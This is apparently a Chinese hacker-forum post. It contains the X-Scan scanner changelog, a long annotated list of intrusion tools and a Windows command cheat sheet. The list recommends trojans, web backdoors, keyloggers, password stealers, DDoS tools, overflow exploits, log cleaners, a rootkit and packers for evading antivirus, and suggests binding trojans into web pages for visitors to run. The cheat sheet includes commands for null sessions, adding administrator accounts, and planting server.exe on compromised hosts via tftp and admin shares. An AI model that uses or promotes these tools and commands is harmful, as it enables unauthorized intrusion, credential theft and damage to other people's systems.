感谢悟休、quack帮忙精选nasl脚本列表,感谢san为支持X-Scan项目编写相关页面程序。再次感谢安全焦点论坛上所有提供优秀思路和协助测试的朋友们。
X-Scan v3.0(beta) -- 发布日期:12/30/2003,对主程序结构进行调整,加入移植的NASL插件,支持2.0.9版本以前的所有NASL脚本;对插件接口做少量修改,方便由其他朋友共同开发插件;对远程操作系统识别功能进行了加强,并去掉了一些可由脚本完成的插件。
感谢isno和Enfis提供优秀插件,感谢悟休、quack帮忙精选nasl脚本列表,也感谢其他提供优秀思路和协助测试的朋友。
X-Scan v2.3 -- 发布日期:09/29/2002,新增SSL插件,用于检测SSL漏洞;升级PORT、HTTP、IIS插件;升级图形界面并对界面风格作细微调整。
感谢ilsy提供优秀插件。
X-Scan v2.2 -- 发布日期:09/12/2002,修正PORT插件中线程同步BUG;修正RPC插件字符显示BUG;扩充RPC漏洞数据库;调整扫描结果索引文件风格。
感谢xundi、quack、stardust搜集并整理漏洞数据库。
X-Scan v2.1 -- 发布日期:09/08/2002,将SNMP插件扫描项目改为可选;将HTTP、IIS、RPC插件中的“漏洞描述”链接到xundi整理的漏洞数据库;修正2.0以前版本中已知BUG。
X-Scan v2.0 -- 发布日期:08/07/2002,新增路由信息检测、SNMP信息检测插件;升级NETBIOS插件,新增远程注册表信息检测;升级IIS插件,新增对IIS.ASP漏洞的检测;对插件接口做细微修改;更新图形界面,新增“在线升级”功能;扩充CGI漏洞数据库;修正1.3以前版本中已知BUG。
感谢quack、stardust、sinister、ilsy、santa、bingle、casper提供宝贵资料或优秀插件,感谢san、xundi、e4gle协助测试,也感谢所有来信反馈和提出建议的热心朋友。
X-Scan v1.3 -- 发布日期:12/11/2001,修正PORT插件中关于远程操作系统识别的BUG。
X-Scan v1.2 -- 发布日期:12/02/2001,升级HTTP、IIS插件,新增对HTTP重定向错误页面识别功能;升级PORT插件,在无法创建Raw Socket时改为使用标准TCP连接方式检测开放端口。
X-Scan v1.1 -- 发布日期:11/25/2001,将所有检测功能移入插件,使主程序完全成为“容器”;提供多语言支持;更新图形接口程序;修改多线程模式,所有插件共享更大线程数量,提高并发检测速度;新增 *** TP、POP3弱口令用户检测;新增IIS UTF-Code漏洞检测;扩充CGI漏洞列表。
感谢xundi、quack、casper、wollf、黄承等朋友提供的宝贵资料,感谢echo、力立等朋友协助测试,再次向付出了重体力劳动的xundi和quack致谢,涕零.....
X-Scan v1.0(beta) -- 发布日期:07/12/2001,新增对远程操作系统类型及版本识别功能;新增对远程主机地理位置查询功能;在“-iis”选项中,新增对IIS “.ida/.idq”漏洞的扫描,同时更新漏洞描述;在“-port”参数中,允许指定扫描的端口范围(通过修改“dat\config.ini”文件中的“[PORT-LIST]\port=”);在“-ntpass”参数中,允许用户在编辑密码字典时通过“%”通配所有用户名;更新CGI漏洞列表,并对CGI漏洞进行分类,以便根据远程主机系统类型扫描特定CGI漏洞,加快扫描速度。
感谢“天眼”软件作者--watercloud提供“被动识别远程操作系统”模块;感谢“追捕”软件作者--冯志宏提供“IP-地理位置”数据库;感谢quack提供漏洞资料、程序资料、无数有价值的建议还有感情和......
X-Scanner v0.61 -- 发布日期:05/17/2001,在“-iis”选项中新增对IIS CGI文件名二次解码漏洞的检测。
X-Scanner v0.6 -- 发布日期:05/15/2001,新增“-iis”参数,专门用于扫描IIS服务器的“unicode”及“remote .printer overflow”漏洞;更新漏洞描述;调整CGI扫描的超时时间,尽量避免因超时导致的“扫描未完成”情况出现;为避免“RedV”插件被恶意利用,将自动更换主页功能改为自动向“C:\”目录上传包含警告信息的文本文件。
X-Scanner v0.5 -- 发布日期:04/30/2001,修改了命令行参数,使参数含义更加直观;扩充CGI漏洞数据库;对NT弱口令扫描功能进行扩充--允许用户使用用户名及密码字典;增加插件功能,并公布插件接口。
感谢“santa”和“老鬼(colossus)”提供插件。
X-Scanner v0.42b -- 发布日期:03/07/2001,修正了“-b”选项在特定情况导致系统overflow的BUG。
X-Scanner v0.42 -- 发布日期:03/02/2001,允许用户对SQL-SERVER帐户进行扩充,而不局限于扫描“sa”空口令。
X-Scanner v0.41 -- 发布日期:02/19/2001,修正了以前版本中对FTP弱口令检测的BUG;重新优化代码,将xscan.exe与xscan98合二为一。
X-Scanner v0.4 -- 发布日期:02/15/2001,加入对SQL-SERVER默认“sa”帐户的扫描;在充分认识了某些人的惰性之后,临时 *** 了傻瓜式图形界面(一切操作按序号点击即可)。
X-Scanner v0.31 -- 发布日期:01/17/2001,对端口扫描方式和输出文件的格式做了细微调整;对Unicode解码漏洞进行了扩充;提供了for win98的版本和一个简单的CGI列表维护工具。
X-Scanner v0.3 -- 发布日期:12/27/2000,加入线程超时限制;增加 *** 功能;扩充CGI漏洞数据库,加入对Unicode解码等漏洞的检测及描述;修正内存泄露问题。内部测试版。
X-Scanner v0.2 -- 发布日期:12/12/2000,内部测试
怎么诶有可用的 *** 破码器啊?
CGI后门:
cgi网页后门 cgi网页后门,envymask编写...《
网页合并器 本程序可以自动生成网页,可以把网页和EXE合成新的网页,在打开网页的同时自动运行EXE文件.你将木马合并在一个网页中,别人浏览之后,呵呵,我什么都没说~~~
海阳顶端网木马 windows环境下永远不会被查杀的木马,因为它是用asp做的,也是一套asp在线极好的网页编辑软件,支持在线更改、编辑、删除任意文本文件,同时最重要的是解决了无组件asp上传...(中文版
cgi-backdoor 几个cgi木马(十多种利用最新漏洞的web脚本后门,涵盖jsp,php,asp,cgi等等) *
命令行后门类
winshell
WinShell是一个运行在Windows平台上的Telnet服务器软件,主程序是一个仅仅5k左右的可执行文件,可完全独立执行而不依赖于任何系统动态连接库,尽管它体积小小,却功能不凡,支持定制端口、密码保护、多用户登录、NT服务方式、远程文件下载、信息自定义及独特的反DDOS功能等...《入侵NT中winshell的使用》
Gina
Gina木马的主要作用是在系统用户登陆时,将用户登陆的名字,登陆密码等记录到文件中去,因为这个DLL是在登陆时加载,所以不存在象findpass那类程序在用户名字是中文或域名是中文等无法得到用户...儒
Wollf1.5 我们的一位女黑客写的软件,扩展Telnet服务,集成文件传输、Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能,可反向连接,可通过参数选择随系统启动或作为普通进程启动
WinEggDrop Shell 1.50最终版在 一个扩展型的telnet后门程序{中国最强的后门}
**********************************************************************************************
菜鸟扫描软件!
20CN IPC 扫描器正式版
全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户...(中文版)
*** 肉鸡猎手
一个快速查找 *** 肉鸡的小工具
网页信息神探 使得网页不再有秘密,各种信息一目了然,什么电影、图片、Email地址、文章、Flash、压缩文件、可执行文件...等等的链接地址无处可藏!连续而快速下载各种软件、打包教程、VB、VC、动画教程、Flash、电影、 *** 图片
**************************************************************************************
SQL2.exe SQL蠕重听过吧,就是的这个漏洞!
NetScanTools 一款功能强大的 *** 工具包...(英文版)
dvbbs.exe
动网logout.asp利用程序
THCsql
针对David Litchfield发现的MSSQL OpenDataSource函数漏洞的攻击程序,内含源代码。
小紫V2.0追加版
*小紫*(LB论坛噩梦)V2.0追加版加入LB.EXE,可以获得论坛管理员权限。
LB5论坛轰炸机
我兄弟写的程序,{推存}
LB5论坛轰炸机修正版2.5在LB5论坛轰炸机修正版2.0的原有功能基础上增加以下功能及特性:1同时支持6线程轰炸,速度可比V2.0提高一倍以上 2机器智能重新增加,带有自动转向定位功能 3增加监视窗口 4标题可改...(
MSN 消息攻击机
这是一个用于MSN Messenger 的消息攻击机(其实不局限于MSN 的),它具有超快的攻击速度,据测试,在普通Pentium 200 MMX 攻击速度可以达到5条/秒。而且软件体积极小,有效节省系统资源...(
怪狗专用版3389登陆器 我改的一个小程序,有用户名密码,用它可以3389登陆win系统,(必备)
DameWare NT Utilities
一款功能强大的Windows NT/2000/XP 服务器远程控制软件,只要拥有一个远程主机的管理帐号,就能使用它远程GUI下登陆交互控制主机...(英文版)《
追捕: 找到IP所在地!
柳叶擦眼
这个小软件可以列出系统所有的进程(包括隐藏的),并可以杀死进程.这个是共享软件...(中文版)《让传奇木马走开》
Xdebug ey4s大哥写的windows 2000 kernel exploit,有了它提升权限就简单了!
*** 之狐 可得到最新 *** ,用于隐藏真实IP,不过,有能力更好自己在肉机上做个 *** 安全!
HackerDicBuilder 本软件属于一款字典 *** 工具,根据国人设置密码的习惯,利用线程技术,生成字典文件 ... (中文版) 多位朋友点播
scanipc 这个是木头见过的最傻瓜化的入侵软件了,只要设置好你要上传的后门和IP范围,它就会开始工作了,界面简单实用,全自动IPC扫描器,可以同步植入木马,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户 ...
Tiny Honeypot 这是一款简单的蜜罐程序,主要基于iptables的重定向和一个xinetd监听程序,它监听当前没有使用的每个TCP端口记录所有的活动信息,并且提供一些回送信息给入侵者。应答部分全部采用perl程序编写,它提供了足够的交互信息足以愚弄大多数的自动攻击工具和小部分的入侵者。通过缺省的适当限制,该程序可以安装在产品主机上,而几乎不会影响主机的性能(应用平台Linux/POSIX)
Clearlog 用于删除Windows NT/2K/XP的WWW和FTP安全日志文件,通常入侵某台服务器后为了避免被跟踪,都采用这一 *** 来消除IP记录 ... 《入侵全攻略》
LC4 可以检测用户是否使用了不安全的密码,是更好,最快的Win NT/2000 workstations 密码破解工具,目前这是最新版本.它宣称:在P300机器上不到48小时可以破解90%的超级用户(Admin)口令.18%不到10分钟就可以破解出来 ...
独裁者 DDOS 工具, 此软件太厉害,千万不可烂用,否则可能进监狱!
LocatorHack.exe MS Locator!formQueryPacket.wcscpy 远程溢出工具与webdav漏洞一样厉害。Microsoft Windows Locator服务远程缓冲区溢出漏洞
TFTPD32.exe 图形化的TPTP工具,做黑客这样的工具都没有,说不过去!
iis5sp3 说明中说,iis5安装sp3的溢出成功,反正我在sp3下没成功过!
*** brelay.exe 可利用网页得到NT密码散列!{推存}
IECookiesView1.5 可改写cookies信息,有此工具进行cookies欺骗就简单多了,
HackPass.exe,MD5.exe 破解MD5密码的软件~!
DVGetPass.exe 动网tongji.asp漏洞利用工具,可得到论坛管理员权限,再上传ASP木马!呵呵就~~~~
webadv 针对iis+sp3的溢出成功率很高(溢出后system权限!) *
R_ webadv 能用版的webdav漏洞使用工具!听说,日本,繁体都能用,
ipscan 大范围网段快速ipc$猜解
svc 远程安装/删除win2k服务
3389.vbs 远程安装win2k终端服务不需i386
arpsniffer arp环境sniffer(需要winpcap2.1以上) *
ascii 查询字符和数字ascii码(常用来对url编码用以躲避ids或脚本过滤)
ca 远程克隆账号
cca 检查是否有克隆账号
crackvnc 远程/本地破解winvnc密码(本地破用-W参数)
pass.dic 密码字典
debploit win2k+sp2配置更佳权限提升工具
fpipe 端口重定向工具
fscan superscan命令行版本(可定义扫描时的源端口并支持udp端口扫描) *
hgod04 ddos攻击器
idahack ida溢出
idq.dll 利用isapi漏洞提升权限(对sp0+sp1+sp2都非常有效,也是很棒的web后门)
IIS idq溢出
inst.zip 指定程序安装为win2k服务 *
ip_mail.rar 发送主机动态IP的软件 *
ipc.vbs 不依赖ipc$给远程主机开telnet
ispc.exe idq.dll连接客户端
Keyghost.zip 正版键盘记录器
log.vbs 日志清除器(远程清除不依赖ipc$)
msadc.pl winnt的msadc漏洞溢出器 *
MsSqlHack mssql溢出程序1
mysql-client mysql客户端
Name.dic 最常用的中国人用户名(看看你常用的用户名在不在里面)
PassSniffer 大小仅3kb的非交换机sniffer软件 *
psexec 通过ipc管道直接登录主机
pskill 杀进程高手
pslist 列进程高手
rar 命令行下的中文版winrar(功能相当全面) *
reboot.vbs 远程重启主机的脚本
sdemo.zip 巨好的屏幕拍摄的录像软件
shed 远程查找win9x的共享资源
sid 用sid列用户名
SkServerGUI snake多重 *** 软件
SkSockServer snake *** 程序
*** BCrack 是小榕为流光5开发的测试原型,和以往的 *** B(共享)暴力破解工具不同,没有采用系统的API,而是使用了 *** B的协议。Windows 2000可以在同一个会话内进行多次密码试探 ... 《入侵全攻略》
socks 利用这工具安装木马,即使网关重新低格硬盘木马也在嘿嘿 *
SocksCap 把socks5 *** 转化为万能 ***
SPC.zip 可以直接显示出远程win98共享资源密码的东东 *
WMIhack 基于WMI服务进行账号密码的东东(不需要ipc)
skmontor snake的注册表监视器(特酷的)
sql1.exe mssql溢出程序2
sql2.exe mssql溢出程序3
SqlExec mssql客户端
SuperScan GUI界面的优秀扫描器
syn syn攻击之一高手
upx120 特好的压缩软件,常用来压缩木马躲避杀毒软件
wget 命令行下的http下载软件
Win2kPass2 win2k的密码大盗
Winnuke 攻击rpc服务的软件(win2ksp0/1/2/3+winnt+winxp系统不稳定)
*** bnuke 攻击netbios的软件(win2ksp0/1/2/3+winnt+winxp系统死机)
WinPcap_2_3 nmap,arpsniffer等等都要用这个
WinPcap_2_3_nogui.exe 无安装界面自动安装的WinPcap_2_3(命令行版) *
scanbaby2.0 能对80%的mail服务利用漏洞列账号密码破解(超酷哦,去看rfc里有mail弱点说明) *
SuperDic_V31 非常全面的黑客字典生成器
Getadmin win2k+sp3配置的权限提升程序(不错!!!) *
whoami 了理自己的权限
FsSniffer 巨好的非交换机sniffer工具
twwwscan 命令行下巨好的cgi扫描器
TFTPD32 给远方开tftp服务的主机传文件(当然要有个shell)
RangeScan 自定义cgi漏洞的GUI扫描器
pwdump2 本地抓winnt/2k密码散列值(不可缺)
pwdump3 远程抓winnt/2k密码散列值(不可缺)
procexpnt 查看系统进程与端口关联(GUI界面) *
nc 已经不是简单的telnet客户端了
CMD.txt 有什么cmd命令不懂就查查它 *
fport 命令行下查看系统进程与端口关联(没有GUI界面的procexpnt强)
BrutusA2 全功能的密码破解软件,支持telnet,ftp,http等服务的口令破解
cmd.reg 文件名自动补全的reg文件(命令行:按TAB键自动把sys补全为system,再按一次就变为system32)
regshell 命令行下的注册表编辑器
nscopy 备份员工具(当你是Backup Operators组的用户时有时你的权限会比admin还大)
session.rar 有了win/nt2000目标主机的密码散列值,就可以直接发送散列值给主机而登录主机 *
klogger.exe 一个几kb的击键记录工具,运行后会在当前目录生成KLOGGER.TXT文件 *
*** b2 发动 *** b的中间人MITM攻击的工具,在session中插入自己的执行命令 *
xptsc.rar winxp的远程终端客户端(支持win2000/xp)
SQLhack.zip 相当快的mssql密码暴力破解器
mssql 相当快的mssql密码暴力破解器
ntcrack.zip 利用获取到的MD4 passwd hash破解帐号密码
SQLSniffer.rar MSsql的密码明文嗅探器
TelnetHack.rar 在拥有管理员权限的条件下,远程打开WIN2000机器的Telnet服务
RFPortXP.exe XP下关联端口与进程的程序
SQLTools.rar mssql工具包
ServiceApp.exe 远程安装/删除服务
hgod 具有SYN/DrDos/UDP/ICMP/IGMP拒绝服务测试功能的选项
hscan 小型综合扫描器(支持cisco,mysql,mssql,cgi,rpc,ipc(sid),ftp,ssh, *** tp等等相当全面)
HDoor.rar ping后门(icmp后门)
SIDUserEnum.exe 利用sid得到用户列表(小榕的那个sid有时不能完全列举出来) *
RPC_LE.exe 利用rpc溢出使win2k重启(对sp3+sp4hotfix有效) *
r3389.exe 查询Terminal Server更改后的端口(1秒内) *
*** bsniffer.exe 获取访问本地主机网页的主机散列值(支持截获内网主机散列) *
NetEnum.exe 通过3389端口+空连接获取对方主机大量信息 *
aspcode.exe 经测试最有效的asp溢出程序第二版(对sp2有效)
sslproxy 针对使用ssl加密协议的 *** (扫描器通过它就可以扫描ssl主机了!!!!) *
lsa2 在lsa注册表键里获取winnt/2k的明文密码包括sqlserver的(打了补丁就没用了) *
psu.exe 用指定进程的权限打开指定的程序
ldap.msi ldap 轻量级目录服务客户端,通过389端口获取主机大量信息如账号列表 *
rootkit 从系统底层完美隐藏指定进程,服务,注册表键并可以端口绑定的内核级win2k后门!!! *
Xscan 一款强大的扫描软件,可以和流光相媲美 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式,扫描内容包括:远程操作系统类型及版本,标准端口状态及端口BANNER信息,SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、 *** TP-SERVER、POP3-SERVER、NT-SERVER弱口令用户,NT服务器NETBIOS信息、注册表信息等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。 增SSL插件,用于检测SSL漏洞;升级PORT、HTTP、IIS插件...(
x-way2.5 采用多线程形式对服务器系统进行漏洞扫描和安全测试工具,X-WAY多个版本均在Win2000下开发,建议用户使用时候也在Win2000环境,以发挥更佳效果...(中文版)《扫描工具,别忘了x-way2.5》
SSS 俄罗斯出的,更好的扫描软件,还有分析,有漏洞描述,速度慢了点,它是我见地的更好的扫描软件!
NAMP 我一直用的是个这命令行的扫描软件,有win,LINUX版的,又快,又好,支持TCP,UDP,ICMP,安全扫描不会留下扫描日志!
下面的软件本来不想收进来给大家看,因为顶级黑客不入侵个人电脑,基本不用别人写的木马,肯定是人手一个(自己编写的木马)
没有任何杀毒软件能查出来的。
**********************************************************************************************
使用木马改造工具:
ASPack 这个是使用木马都一定要会用的工具,它能压缩木马,不让杀毒软件查出来!
UPX 非常好的可执行文件压缩软件,支持的格式包括 atari/tos,djgpp2/coff,dos/com,dos/exe,dos/sys,rtm32/pe,tmt/adam,watcom/le,win32/pe,Linux/i386 等等,压缩比率也非常的高 ...
**************************************************************************************
菜鸟级木马类:
黑境
近墨者
魔法控制
灰鸽子
风雪 国产后门风雪,此版根据一些网友的建议,改进了几个功能,一个是可以配置是否自动共享C盘的功能,另一个是在查看菜单上加上了密码是否用*号来表示,同时修正了1.3版本在打开网址时按取消键仍会打开网址的BUG...(
*** 神偷 一款远程控制软件,更新速度较快,可以访问局域网中的计算机,连接稳定上传 *** 快,但是会被很多杀毒厂商看成木马病毒追杀,要求使用者有自己的FTP空间 ... (中文版
冰河 3
广外男生
广外女生
Peep
一套运用反端口技术的远程监控软体,运用此原理可以达到一般远程控制软体所无法达到之功能,例如可对区域网路及有架设防火墙的电脑作监控,被控端电脑将具有自动回传连线之功能,通讯埠可任意动态修改,及具有独立连线,也就是说除您本人其他人无法连线监控。其他的功能还有上线通知、连线速率调整、远端档案总管、远端桌面监控、
远端进程管理、远端登录编辑、网页通报服务、DDoS攻击、还有被控端程式设置精灵、有常驻选择、文件捆绑及连线方式等选项...(中文版)
木牛隐型版 运行后,服务器上硬盘C盘符共享(完全控制权限)开启ADMIN$、IPC$共享,开启TELNET服务,自动创建一个管理员权限帐号:IUSR_COMPUTER 密码:IUSR_COMPUTER...该版本自动修改注册表,重起后自动运行
IE'en 通过IE远程控制的软件。它可以远程遥控IE动作,可以直接截取IE和任何服务器之间的数据通讯,你在IE中输入的用户名、密码等机密信息都在此列,它可以以纯文本方式存储或发送这些信息,一旦启动这一软件,远端被监控的浏览器窗口中进行的任何输入输出都会显示在本地IE'en中。运行ieen_s.exe(注:服务端)需要管理员权限
盗密高手 监视被监视端(装了此程序的电脑)上 *** 、邮箱等各种密码,并发送到您设置的邮箱
那有dos常用命令字典?
DOS常用命令大全
net use \ipipc$ " " /user:" " 建立IPC空链接
net use \ipipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \ipc$ "密码" /user:"用户名"
直接登陆后映射对方C:到本地为H:
net use h: \ipc$ 登陆后映射对方C:到本地为H:
net use \ipipc$ /net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup ***istrators 用户名 /add
把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \目标ip 查看对方时间
net time \目标ip /set
设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \ip 查看对方局域网内开启了哪些共享
net config 显示系统 *** 设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的 *** 连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的 *** 连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip
查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip
对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名)
跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名)
向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip
死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95
98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t
以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名
加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文
件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR
*.*”表示删除当前目录下所有只读文件,“DEL/A-S
*.*”表示删除当前目录下除系统文件以外的所有文件
#2 二:
del /S /Q 目录 或用:rmdir /s /Q 目录
/S删除目录及目录下的所有子目录和文件。同时使用参数/Q
可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符路径要移动的文件名 存放移动文件的路径移动后文件名
移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt
对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \ip time 程序名(或一个命令) /r
在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径文件名1 路径文件名2 /y
复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:srv.exe \ip***$ 复制本地c:srv.exe到对方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy \ip***$svv.exe c: 或:copy\ip***$*.*
复制对方***i$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址目录名
复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe
登陆后,将“IP”的server.exe下载到目标主机c:server.exe
参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i
则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机
ftp ip 端口
用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示 *** 地址Network
addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp
查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min
新开一个新窗口并更大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的
存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir
查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文
件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t
使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签
将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径批处理文件名 从批处理程序中调用另一个批处理程序
(更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值
设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky )
#3 三:
ver 在DOS窗口下显示版本信息
winver
弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D:
/FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令=
为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey
dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误
tlntadmn
telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口
exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe
path 路径可执行文件的文件名 为可执行文件设置一个路径。
cmd 启动一个win2K命令解释窗口。参数:/eff、/en
关闭、开启命令扩展;更我详细说明见cmd /?
regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;
regedit /e 注册表文件名 导出注册表
cacls 文件名 参数
显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm
替换指定用户的访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W
写入, C 更改(写入),F 完全控制;例:cacls D:test.txt /D pub
设定d:test.txt拒绝pub用户访问。
cacls 文件名 查看文件的访问用户权限列表
REM 文本内容 在批处理文件中添加注解
netsh 查看或更改本地 *** 配置情况
#4 四:
IIS服务命令:
iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)
iisreset /start或stop 启动(停止)所有Internet服务
iisreset /restart 停止然后重新启动所有Internet服务
iisreset /status 显示所有Internet服务状态
iisreset /enable或disable
在本地系统上启用(禁用)Internet服务的重新启动
iisreset /rebootonerror
当启动、停止或重新启动Internet服务时,若发生错误将重新开机
iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务
iisreset /timeout
Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。
FTP 命令: (后面有详细说明内容)
ftp的命令行格式为:
ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。
-d 使用调试方式。
-n 限制ftp的自动登录,即不使用.netrc文件。
-g 取消全局文件名。
help [命令] 或 ?[命令] 查看命令说明
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
pwd 列出当前远端主机目录
put 或 send 本地文件名 [上传到主机上的文件名]
将本地一个文件传送至远端主机中
get 或 recv [远程主机文件名] [下载到本地后的文件名]
从远端主机中传送至本地主机中
mget [remote-files] 从远端主机接收一批文件至本地主机
mput local-files 将本地主机中一批文件传送至远端主机
dir 或 ls [remote-directory] [local-file]
列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
ascii 设定以ASCII方式传送文件(缺省值)
bin 或 image 设定以二进制方式传送文件
bell 每完成一次文件传送,报警提示
cdup 返回上一级目录
close 中断与远程服务器的ftp会话(与open对应)
open host[port] 建立指定ftp服务器连接,可指定连接端口
delete 删除远端主机中的文件
mdelete [remote-files] 删除一批文件
mkdir directory-name 在远端主机中建立目录
rename [from] [to] 改变远端主机中的文件名
rmdir directory-name 删除远端主机中的目录
status 显示当前FTP的状态
system 显示远端主机系统类型
user user-name [password] [account] 重新以别的用户名登录远端主机
open host [port] 重新建立一个新的连接
prompt 交互提示模式
macdef 定义宏命令
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
chmod 改变远端主机的文件权限
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
cd remote-dir 进入远程主机目录
cdup 进入远程主机目录的父
目录
! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip
#5 五:
MYSQL 命令:
mysql -h主机地址 -u用户名 -p密码
连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysql*** -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by "密码";
